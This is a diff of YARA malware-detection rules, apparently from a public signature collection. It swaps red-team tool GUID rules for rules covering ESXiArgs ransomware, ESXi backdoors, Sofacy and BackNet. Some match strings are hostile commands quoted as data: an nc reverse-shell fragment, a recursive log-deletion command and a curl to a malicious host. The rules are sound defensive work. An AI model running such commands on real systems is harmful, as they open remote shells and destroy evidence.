-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1488-L1502"
+		description = "Detects script used in ransomware attacks exploiting and encrypting ESXi servers - file encrypt.sh"
+		author = "Florian Roth"
+		id = "7178dbe4-f573-5279-a23e-9bab8ae8b743"
+		date = "2023-02-04"
+		modified = "2023-12-05"
+		reference = "https://www.bleepingcomputer.com/forums/t/782193/esxi-ransomware-help-and-support-topic-esxiargs-args-extension/page-14"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_ransom_esxi_attacks_feb23.yar#L6-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "726b573fa957a2560d6f4e5e98497190ed8f8e1657427f14896e3aa439366c70"
-		score = 75
-		quality = 85
+		logic_hash = "1143ee36603f604874432ee280314a9f62ffe64e58ec5cd4eb114b7b175b365a"
+		score = 85
+		quality = 60
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "10c3b6b03a9bf105d264a8e7f30dcab0a6c59a414529b0af0a6bd9f1d2984459"
 
 	strings:
-		$typelibguid0lo = "0d588c86-c680-4b0d-9aed-418f1bb94255" ascii wide
-		$typelibguid0up = "0D588C86-C680-4B0D-9AED-418F1BB94255" ascii wide
+		$x1 = "/bin/find / -name *.log -exec /bin/rm -rf {} \\;" ascii fullword
+		$x2 = "/bin/touch -r /etc/vmware/rhttpproxy/config.xml /bin/hostd-probe.sh" ascii fullword
+		$x3 = "grep encrypt | /bin/grep -v grep | /bin/wc -l)" ascii fullword
+		$s1 = "## ENCRYPT" ascii fullword
+		$s2 = "/bin/find / -name *.log -exec /bin" ascii fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x2123 and filesize < 10KB and ( 1 of ( $x* ) or 2 of them ) or 3 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharppack : FILE
+rule SIGNATURE_BASE_MAL_RANSOM_ELF_Esxi_Attacks_Feb23_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "633d074a-b8c2-5148-ad80-6226b99be818"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/Lexus89/SharpPack"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1504-L1532"
+		description = "Detects ransomware exploiting and encrypting ESXi servers"
+		author = "Florian Roth"
+		id = "d0a813aa-41f8-57df-b708-18ccb0d7a3e5"
+		date = "2023-02-04"
+		modified = "2023-12-05"
+		reference = "https://www.bleepingcomputer.com/forums/t/782193/esxi-ransomware-help-and-support-topic-esxiargs-args-extension/page-14"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_ransom_esxi_attacks_feb23.yar#L30-L56"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b3f86041560b8358c5408d73d8eb847d600e66ca2c9900f53d193902e4ae8eee"
-		score = 75
+		logic_hash = "27ff018574323c10821993c30cf74de15121caa92a308fbcae4eceae954e63b6"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "11b1b2375d9d840912cfd1f0d0d04d93ed0cddb0ae4ddb550a5b62cd044d6b66"
 
 	strings:
-		$typelibguid1lo = "b59c7741-d522-4a41-bf4d-9badddebb84a" ascii wide
-		$typelibguid1up = "B59C7741-D522-4A41-BF4D-9BADDDEBB84A" ascii wide
-		$typelibguid2lo = "fd6bdf7a-fef4-4b28-9027-5bf750f08048" ascii wide
-		$typelibguid2up = "FD6BDF7A-FEF4-4B28-9027-5BF750F08048" ascii wide
-		$typelibguid3lo = "6dd22880-dac5-4b4d-9c91-8c35cc7b8180" ascii wide
-		$typelibguid3up = "6DD22880-DAC5-4B4D-9C91-8C35CC7B8180" ascii wide
-		$typelibguid5lo = "f3037587-1a3b-41f1-aa71-b026efdb2a82" ascii wide
-		$typelibguid5up = "F3037587-1A3B-41F1-AA71-B026EFDB2A82" ascii wide
-		$typelibguid6lo = "41a90a6a-f9ed-4a2f-8448-d544ec1fd753" ascii wide
-		$typelibguid6up = "41A90A6A-F9ED-4A2F-8448-D544EC1FD753" ascii wide
-		$typelibguid7lo = "3787435b-8352-4bd8-a1c6-e5a1b73921f4" ascii wide
-		$typelibguid7up = "3787435B-8352-4BD8-A1C6-E5A1B73921F4" ascii wide
-		$typelibguid8lo = "fdd654f5-5c54-4d93-bf8e-faf11b00e3e9" ascii wide
-		$typelibguid8up = "FDD654F5-5C54-4D93-BF8E-FAF11B00E3E9" ascii wide
-		$typelibguid9lo = "aec32155-d589-4150-8fe7-2900df4554c8" ascii wide
-		$typelibguid9up = "AEC32155-D589-4150-8FE7-2900DF4554C8" ascii wide
+		$x1 = "usage: encrypt <public_key> <file_to_encrypt> [<enc_step>] [<enc_size>] [<file_size>]" ascii fullword
+		$x2 = "[ %s ] - FAIL { Errno: %d }" ascii fullword
+		$s1 = "lPEM_read_bio_RSAPrivateKey" ascii fullword
+		$s2 = "lERR_get_error" ascii fullword
+		$s3 = "get_pk_data: key file is empty!" ascii fullword
+		$op1 = { 8b 45 a8 03 45 d0 89 45 d4 8b 45 a4 69 c0 07 53 65 54 89 45 a8 8b 45 a8 c1 c8 19 }
+		$op2 = { 48 89 95 40 fd ff ff 48 83 bd 40 fd ff ff 00 0f 85 2e 01 00 00 48 8b 9d 50 ff ff ff 48 89 9d 30 fd ff ff 48 83 bd 30 fd ff ff 00 78 13 f2 48 0f 2a 85 30 fd ff ff }
+		$op3 = { 31 55 b4 f7 55 b8 8b 4d ac 09 4d b8 8b 45 b8 31 45 bc c1 4d bc 13 c1 4d b4 1d }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x457f and filesize < 200KB and ( 1 of ( $x* ) or 3 of them ) or 4 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Salsa_Tools : FILE
+rule SIGNATURE_BASE_APT_PY_Esxi_Backdoor_Dec22 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "50db578e-6ddb-54d1-a978-e3630a3548c3"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/Hackplayers/Salsa-tools"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1534-L1550"
+		description = "Detects Python backdoor found on ESXi servers"
+		author = "Florian Roth"
+		id = "f0a3b9b9-0031-5d9f-97f8-70f83863ee63"
+		date = "2022-12-14"
+		modified = "2023-12-05"
+		reference = "https://blogs.juniper.net/en-us/threat-research/a-custom-python-backdoor-for-vmware-esxi-servers"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_ransom_esxi_attacks_feb23.yar#L58-L71"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4c02f8fb1f1dbad19360c28d0728ccb5a73db5d34127bd345fe5c4baeb87fc7c"
-		score = 75
+		logic_hash = "86b628f007720aa706c30d91e845d867ed481d1e99bcc9315c84a4e0b7b1b2a6"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "276004bb-5200-4381-843c-934e4c385b66" ascii wide
-		$typelibguid0up = "276004BB-5200-4381-843C-934E4C385B66" ascii wide
-		$typelibguid1lo = "cfcbf7b6-1c69-4b1f-8651-6bdb4b55f6b9" ascii wide
-		$typelibguid1up = "CFCBF7B6-1C69-4B1F-8651-6BDB4B55F6B9" ascii wide
+		$x1 = "cmd = str(base64.b64decode(encoded_cmd), " ascii
+		$x2 = "sh -i 2>&1 | nc %s %s > /tmp/" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 10KB and 1 of them or all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Windowsdefender_Payload_Downloader : FILE
+rule SIGNATURE_BASE_APT_SH_Esxi_Backdoor_Dec22 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "6e494a91-c05e-5a2e-8aa9-77600f3bdd47"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/notkohlrexo/WindowsDefender-Payload-Downloader"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1552-L1566"
+		description = "Detects malicious script found on ESXi servers"
+		author = "Florian Roth"
+		id = "983ac20c-2e61-5365-8849-b3aeb999f909"
+		date = "2022-12-14"
+		modified = "2023-12-05"
+		reference = "https://blogs.juniper.net/en-us/threat-research/a-custom-python-backdoor-for-vmware-esxi-servers"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_ransom_esxi_attacks_feb23.yar#L73-L87"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e4f0a7db1ff7dda5f66cb466cf70e717a9050541dd6a79acd9c8f5723267f5a4"
+		logic_hash = "155a90a6c55b99285555634d91a66fca9c7e7297f05314fa4d6ce1d84257ee11"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "2f8b4d26-7620-4e11-b296-bc46eba3adfc" ascii wide
-		$typelibguid0up = "2F8B4D26-7620-4E11-B296-BC46EBA3ADFC" ascii wide
+		$x1 = "mv /bin/hostd-probe.sh /bin/hostd-probe.sh.1" ascii fullword
+		$x2 = "/bin/nohup /bin/python -u /store/packages/vmtools.py" ascii
+		$x3 = "/bin/rm /bin/hostd-probe.sh.1"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 10KB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Privilege_Escalation : FILE
+rule SIGNATURE_BASE_MAL_RANSOM_SH_Esxi_Attacks_Feb23_2 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "28615807-6637-57fc-ba56-efc64b041b80"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/Mrakovic-ORG/Privilege_Escalation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1568-L1582"
+		description = "Detects script used in ransomware attacks exploiting and encrypting ESXi servers"
+		author = "Florian Roth"
+		id = "d1282dee-0496-52f1-a2b7-27657ab4df8c"
+		date = "2023-02-06"
+		modified = "2023-12-05"
+		reference = "https://dev.to/xakrume/esxiargs-encryption-malware-launches-massive-attacks-against-vmware-esxi-servers-pfe"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_ransom_esxi_attacks_feb23.yar#L89-L101"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1fd2eed72a4971f494fcb924b77edb6ab49b8bde400eb2785df00b9b867692d0"
-		score = 75
+		logic_hash = "3f240784873a0239cbf61f7f420fdd72b8992d5943ffc3d4dcad43c836569f4d"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "ed54b904-5645-4830-8e68-52fd9ecbb2eb" ascii wide
-		$typelibguid0up = "ED54B904-5645-4830-8E68-52FD9ECBB2EB" ascii wide
+		$x1 = "echo \"START ENCRYPT: $file_e SIZE: $size_kb STEP SIZE: " ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 10KB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Marauder : FILE
+rule SIGNATURE_BASE_SUSP_Esxiargs_Endpoint_Conf_Aug23 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "f2783477-2853-5dcd-95f5-9f1e07a4a6e8"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/maraudershell/Marauder"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1584-L1598"
+		description = "Detects indicators found in endpoint.conf files as modified by actors in the ESXiArgs campaign"
+		author = "Florian Roth"
+		id = "3e0b5dbf-7c5b-5599-823a-ce35fbdbe64b"
+		date = "2023-08-04"
+		modified = "2023-12-05"
+		reference = "https://www.bleepingcomputer.com/forums/t/782193/esxi-ransomware-help-and-support-topic-esxiargs-args-extension/page-47"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_ransom_esxi_attacks_feb23.yar#L103-L120"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8314db477f299931e6bb933be0234f18cfb3e36d6170b4aed1d482949aba75e8"
+		logic_hash = "794d460eec0e2f0b48e6ced94b125a1e48acde6be6281866e0b4a2ae6c2d3b51"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "fff0a9a3-dfd4-402b-a251-6046d765ad78" ascii wide
-		$typelibguid0up = "FFF0A9A3-DFD4-402B-A251-6046D765AD78" ascii wide
+		$a1 = "/client/clients.xml" ascii
+		$a2 = "/var/run/vmware/proxy-sdk-tunnel" ascii fullword
+		$a3 = "redirect" ascii fullword
+		$a4 = "allow" ascii fullword
+		$s1 = " local 8008 allow allow"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 2KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_AV_Evasion_Tool : FILE
+rule SIGNATURE_BASE_HKTL_Keyword_Injectdll : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "d4257465-38a0-56b9-8402-b92e21b96cb0"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/1y0n/AV_Evasion_Tool"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1600-L1616"
+		description = "Detects suspicious InjectDLL keyword found in hacktools or possibly unwanted applications"
+		author = "Florian Roth (Nextron Systems)"
+		id = "422eed76-7dfa-5490-a866-d337434eaddc"
+		date = "2019-04-04"
+		modified = "2023-12-05"
+		reference = "https://github.com/zerosum0x0/koadic"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_hacktool.yar#L2-L16"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "682d16cbef455680186ca9d17c3d24619e4b018cd7915cea4f0e2f2f0c843e98"
-		score = 75
+		logic_hash = "51c54026672e9ad36d2d68ae8dba61437f8808fbf2ad3c3c7bb086d8abb63987"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2e7b4141e1872857904a0ef2d87535fd913cbdd9f964421f521b5a228a492a29"
 
 	strings:
-		$typelibguid0lo = "1937ee16-57d7-4a5f-88f4-024244f19dc6" ascii wide
-		$typelibguid0up = "1937EE16-57D7-4A5F-88F4-024244F19DC6" ascii wide
-		$typelibguid1lo = "7898617d-08d2-4297-adfe-5edd5c1b828b" ascii wide
-		$typelibguid1up = "7898617D-08D2-4297-ADFE-5EDD5C1B828B" ascii wide
+		$s2 = "InjectDLL" fullword ascii
+		$s4 = "Kernel32.dll" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Fenrir : FILE
+rule SIGNATURE_BASE_HKTL_Python_Sectools
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "cfc6312d-5997-5261-b771-c7f3f30bf86c"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/nccgroup/Fenrir"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1618-L1632"
+		description = "Detects code which uses the python lib sectools"
+		author = "Arnim Rupp"
+		id = "89a5e0ba-5547-53e4-84a3-d07ee779596e"
+		date = "2023-01-27"
+		modified = "2023-12-05"
+		reference = "https://github.com/p0dalirius/sectools"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_hacktool.yar#L18-L35"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f2fb94506f10bbf9f077cb81019873c810ea983888192b0d5ccb3e5e02891288"
-		score = 75
+		hash = "814ba1aa62bbb7aba886edae0f4ac5370818de15ca22a52a6ab667b4e93abf84"
+		hash = "b3328ac397d311e6eb79f0a5b9da155c4d1987e0d67487ea681ea59d93641d9e"
+		hash = "8cd205d5380278cff6673520439057e78fb8bf3d2b1c3c9be8463e949e5be4a1"
+		logic_hash = "17f6897dc623f822c7ae6a7ae51714e78316d7b7fdf59b9f2f625ecaae939522"
+		score = 50
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "aecec195-f143-4d02-b946-df0e1433bd2e" ascii wide
-		$typelibguid0up = "AECEC195-F143-4D02-B946-DF0E1433BD2E" ascii wide
+		$import1 = "from sectools"
+		$import2 = "import sectools"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		any of ( $import* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Stormkitty : FILE
+
+rule SIGNATURE_BASE_Sofacy_Oct17_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "09d66661-5b67-5846-9bea-ec682afb62cf"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/LimerBoy/StormKitty"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1634-L1650"
+		description = "Detects Sofacy malware reported in October 2017"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6896dcf3-e422-5a40-bc1e-d1f35ae95c14"
+		date = "2017-10-23"
+		modified = "2023-12-05"
+		reference = "http://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy_oct17_camp.yar#L13-L47"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "aef8e28d9eb5f6cd6fdc0a8bf60f00b99a920197a0ecaa75baca5a8570973ab7"
+		logic_hash = "c3620d0b347e6cc54af9e046f6b3b6515bfa23dd11225ce2720e09838708a42e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "522fd9b35323af55113455d823571f71332e53dde988c2eb41395cf6b0c15805"
 
 	strings:
-		$typelibguid0lo = "a16abbb4-985b-4db2-a80c-21268b26c73d" ascii wide
-		$typelibguid0up = "A16ABBB4-985B-4DB2-A80C-21268B26C73D" ascii wide
-		$typelibguid1lo = "98075331-1f86-48c8-ae29-29da39a8f98b" ascii wide
-		$typelibguid1up = "98075331-1F86-48C8-AE29-29DA39A8F98B" ascii wide
+		$x1 = "%localappdata%\\netwf.dll" fullword wide
+		$x2 = "set path = \"%localappdata%\\netwf.dll\"" fullword ascii
+		$x3 = "%localappdata%\\netwf.bat" fullword wide
+		$x4 = "KlpSvc.dll" fullword ascii
+		$g1 = "set path = \"%localappdata%\\" ascii
+		$g2 = "%localappdata%\\" wide
+		$s1 = "start rundll32.exe %path %,#1a" fullword ascii
+		$s2 = "gshell32" fullword wide
+		$s3 = "s - %lu" fullword ascii
+		$s4 = "be run i" fullword ascii
+		$s5 = "ingToBinhary" fullword ascii
+		$s6 = "%j%Xjs" fullword ascii
+		$s7 = "if NOT exist %path % (exit)" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "a2d1be6502b4b3c28959a4fb0196ea45" or pe.exports ( "KlpSvc" ) or ( 1 of ( $x* ) or 4 of them ) or ( $s1 and all of ( $g* ) ) )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Crypter_Runtime_AV_S_Bypass : FILE
+
+rule SIGNATURE_BASE_Sofacy_Oct17_2 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "726cd57b-d88a-5854-b2e1-76d9bd71a155"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/netreverse/Crypter-Runtime-AV-s-bypass"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1652-L1666"
+		description = "Detects Sofacy malware reported in October 2017"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c820eab0-9b64-5718-8681-a4f515ee462b"
+		date = "2017-10-23"
+		modified = "2023-12-05"
+		reference = "http://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy_oct17_camp.yar#L49-L71"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "368023cf6e78965696f676a45858b671ff75f329419ec4d7a02767c81e503027"
+		logic_hash = "c2736cf9efbb022590f4c23986531e645ac412a5b98a950b143f2d75a33e8063"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ef027405492bc0719437eb58c3d2774cc87845f30c40040bbebbcc09a4e3dd18"
 
 	strings:
-		$typelibguid0lo = "c25e39a9-8215-43aa-96a3-da0e9512ec18" ascii wide
-		$typelibguid0up = "C25E39A9-8215-43AA-96A3-DA0E9512EC18" ascii wide
+		$x1 = "netwf.dll" fullword wide
+		$s1 = "%s - %s - %2.2x" fullword wide
+		$s2 = "%s - %lu" fullword ascii
+		$s3 = "%s \"%s\", %s" fullword wide
+		$s4 = "%j%Xjsf" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 90KB and ( pe.imphash ( ) == "13344e2a717849489bcd93692f9646f7" or ( 4 of them ) ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Runasuser : FILE
+rule SIGNATURE_BASE_MAL_Backnet_Nov18_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "ead7819a-1397-5953-888f-2176e4041375"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/atthacks/RunAsUser"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1668-L1682"
+		description = "Detects BackNet samples"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f8575c5a-710d-5e97-91c1-5db454c6baf4"
+		date = "2018-11-02"
+		modified = "2023-12-05"
+		reference = "https://github.com/valsov/BackNet"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_backnet.yar#L2-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "585db3eecb3bb91d594c1929c4790acbde8d1c44ae30de2410ef98796c297470"
+		logic_hash = "ea809a65a3cd786efe03ff7d831847e658851f76ee9dd084cb6c622b6e44c75f"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4ce82644eaa1a00cdb6e2f363743553f2e4bd1eddb8bc84e45eda7c0699d9adc"
 
 	strings:
-		$typelibguid0lo = "9dff282c-93b9-4063-bf8a-b6798371d35a" ascii wide
-		$typelibguid0up = "9DFF282C-93B9-4063-BF8A-B6798371D35A" ascii wide
+		$s1 = "ProcessedByFody" fullword ascii
+		$s2 = "SELECT * FROM AntivirusProduct" fullword wide
+		$s3 = "/C netsh wlan show profile" wide
+		$s4 = "browsertornado" fullword wide
+		$s5 = "Current user is administrator" fullword wide
+		$s6 = "/C choice /C Y /N /D Y /T 4 & Del" wide
+		$s7 = "ThisIsMyMutex-2JUY34DE8E23D7" wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 2 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Hwidbypass : FILE
+rule SIGNATURE_BASE_MAL_Github_Repo_Compromise_Myjino_Ru_Aug22
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "62b0541b-6eec-546e-8445-85d25bb0d784"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/yunseok/HWIDbypass"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1684-L1698"
+		description = "Detects URL mentioned in report on compromised Github repositories in August 2022"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1eaabad5-d0de-5d17-a5fa-3c638354843d"
+		date = "2022-08-03"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/stephenlacy/status/1554697077430505473"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_repo_compromise_myjino_ru.yar#L2-L15"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "17d34d65e2867c054c7ef941c8f92a89c42f7d21a301fd5230970ac07d003d90"
-		score = 75
+		logic_hash = "5cbe6ee46a68d89b1e772762e29baa907458235cd014f20a0d0932e95c046f19"
+		score = 90
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$typelibguid0lo = "47e08791-d124-4746-bc50-24bd1ee719a6" ascii wide
-		$typelibguid0up = "47E08791-D124-4746-BC50-24BD1EE719A6" ascii wide
+		$x1 = "curl http://ovz1.j19544519.pr46m.vps.myjino.ru" ascii wide
+		$x2 = "http__.Post(\"http://ovz1.j19544519.pr46m.vps.myjino.ru" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Xoredreflectivedll : FILE
+rule SIGNATURE_BASE_Triton_Trilog : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "9b584bfb-98ef-50ee-b546-780c4b210a1b"
-		date = "2020-12-13"
